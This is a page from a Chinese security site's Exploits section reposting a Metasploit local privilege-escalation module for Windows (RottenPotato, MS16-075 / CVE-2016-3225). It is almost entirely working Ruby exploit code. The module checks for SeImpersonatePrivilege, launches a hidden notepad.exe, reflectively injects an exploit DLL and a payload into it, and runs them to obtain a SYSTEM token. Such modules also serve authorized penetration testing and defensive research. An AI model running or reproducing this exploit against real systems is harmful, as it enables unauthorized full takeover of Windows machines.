首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Windows Net-NTLMv2 Reflection DCOM/RPC
来源:metasploit.com 作者:Mumbai 发布时间:2018-10-08  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/windows/reflective_dll_injection'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows Net-NTLMv2 Reflection DCOM/RPC',
      'Description'    => %q(
        Module utilizes the Net-NTLMv2 reflection between DCOM/RPC
        to achieve a SYSTEM handle for elevation of privilege. Currently the module
        does not spawn as SYSTEM, however once achieving a shell, one can easily
        use incognito to impersonate the token.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'FoxGloveSec', # the original Potato exploit
          'breenmachine', # Rotten Potato NG!
          'Mumbai' # Austin : port of RottenPotato for reflection & quick module
        ],
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Platform'       => 'win',
      'SessionTypes'   => ['meterpreter'],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'none',
          'WfsDelay' => '20'
        },
      'Targets'        =>
        [
          ['Automatic', {}],
          ['Windows x86', { 'Arch' => ARCH_X86 }],
          ['Windows x64', { 'Arch' => ARCH_X64 }]
        ],
      'Payload'         =>
        {
          'DisableNops' => true
        },
      'References'      =>
        [
          ['MSB', 'MS16-075'],
          ['CVE', '2016-3225'],
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],
          ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],
          ['URL', 'https://github.com/breenmachine/RottenPotatoNG']
        ],
      'DisclosureDate' => 'Jan 16 2016',
      'DefaultTarget'  => 0
    }))
  end

  def assign_target
    if target.name == 'Automatic'
      case sysinfo["Architecture"]
      when 'x86'
        vprint_status("Found we are on an x86 target")
        my_target = targets[1]
      when 'x64'
        vprint_status("Found we are on an x64 target")
        my_target = targets[2]
      else
        fail_with(Failure::NoTarget, "Unable to determine target")
      end
    else
      my_target = target
    end
    return my_target
  end

  def verify_arch(my_target)
    if my_target["Arch"] != sysinfo["Architecture"]
      print_error("Assigned Target Arch = #{my_target.opts['Arch']}")
      print_error("Actual Target Arch = #{sysinfo['Architecture']}")
      fail_with(Failure::BadConfig, "Assigned Arch does not match reality")
    end
    if client.arch != sysinfo["Architecture"]
      fail_with(Failure::BadConfig, "Session/Target Arch mismatch; WOW64 not supported")
    else
      vprint_good("Current payload and target Arch match....")
    end
  end

  def check
    privs = client.sys.config.getprivs
    if privs.include?('SeImpersonatePrivilege')
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end
    my_target = assign_target
    print_status("#{my_target['Arch']}")
    verify_arch(my_target)
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege')
    end
    if my_target.opts['Arch'] == 'x64'
      dll_file_name = 'rottenpotato.x64.dll'
      vprint_status("Assigning payload rottenpotato.x64.dll")
    elsif my_target.opts['Arch'] == 'x86'
      dll_file_name = 'rottenpotato.x86.dll'
      vprint_status("Assigning payload rottenpotato.x86.dll")
    else
      fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code")
    end
    print_status('Launching notepad to host the exploit...')
    notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
    begin
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      print_error('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end
    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    library_path = ::File.join(Msf::Config.data_directory, "exploits", "rottenpotato", dll_file_name)
    library_path = ::File.expand_path(library_path)
    print_status("Injecting exploit into #{process.pid}...")
    exploit_mem, offset = inject_dll_into_process(process, library_path)
    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(process, payload.encoded)
    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Payload injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy File Sharing Web Server 7
·Navigate CMS Unauthenticated R
·ISPConfig < 3.1.13 - Remote Co
·Zahir Enterprise Plus 6 Stack
·NICO-FTP 3.0.1.19 - Buffer Ove
·Unitrends UEB HTTP API Remote
·FTP Voyager 16.2.0 - Denial of
·H2 Database 1.4.196 - Remote C
·FLIR Thermal Traffic Cameras 1
·Zahir Enterprise Plus 6 build
·360 3.5.0.1033 - Sandbox Escap
·Snes9K 0.0.9z - Denial of Serv
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved